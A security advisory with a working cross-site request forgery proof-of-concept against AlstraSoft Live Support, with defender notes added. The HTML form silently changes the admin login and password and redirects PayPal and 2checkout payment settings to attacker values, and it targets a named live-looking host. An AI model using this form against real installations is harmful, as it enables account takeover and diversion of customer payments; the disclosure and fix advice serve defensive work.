< ------------------- header data start ------------------- >
#############################################################
# Application Name :AlstraSoft Live Support
# Vulnerability Type : XSRF (cross-site request forgery, CSRF)
# Impact : Admin account details can be changed.
# Bug Fix Advice : A session key (session token) should be added to the form, and the old password should be required.
# author : BUG RESEARCHERS//CWH1RLPOOL
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
<!-- Proof-of-concept form from the advisory. It targets the admin settings
     handler (admin/managesettings.php) and contains no per-session anti-CSRF
     token and no current-password field, which is the weakness the advisory
     header reports. The action is an absolute URL, so the markup does not
     depend on being served by the application itself. -->
<!-- method=get places every field below in the URL query string, so the new
     credentials would also land in web server and proxy logs.
     NOTE(review): whether the handler also accepts POST is not shown here. -->
<form action=http://www.blizsoft.com/live/admin/managesettings.php method=get
enctype=application/x-www-form-urlencoded>
<!-- Replacement admin login and password; the form never asks for the
     existing password. -->
<input class=DataFONT type=Text name=login maxlength=30 size=30 value=cwhirlpool>
<input class=DataFONT type=Text name=password maxlength=30 size=30 value=cwhirlpool>
<!-- Payment settings sent in the same request. Presumably these control where
     and how customer payments are collected: confirm against the handler. -->
<input class=DataFONT type=Text name=2checkoutID maxlength=30 size=30 value=250535>
<input class=DataFONT type=Text name=paypal_email maxlength=30 size=30
value=bugres@cwhirlpool>
<input class=DataFONT type=Text name=payment_amount maxlength=30 size=30 value=10>
<input onclick=javascript: document.all.requrring_period.disabled=1 type=Radio
name=payment_type value=once >
<input onclick=javascript: document.all.requrring_period.disabled=0 type=Radio
name=payment_type value=month checked>
<input class=DataFONT type=Text name=requrring_period maxlength=30 size=30 value=30 >
<!-- FormAction and FormName look like the selector fields the handler reads to
     decide that this is an update: TODO confirm in the server-side code. -->
<input type=hidden value=update name=FormAction/>
<input class=child type=submit value=update onclick=document.Form.FormAction.value = ’update’;>
<input type=hidden name=FormName value=Form>
</form>
<!-- Defender notes. Fix as the advisory advises: validate a per-session token
     server-side and require the current password before changing credentials.
     Settings changes should also be accepted over POST only, and a SameSite
     attribute on the session cookie reduces cross-site exposure.
     Detection: review access logs for GET requests to managesettings.php that
     carry login, password or paypal_email parameters, particularly with a
     Referer from another site. -->
< -- bug code end of -- >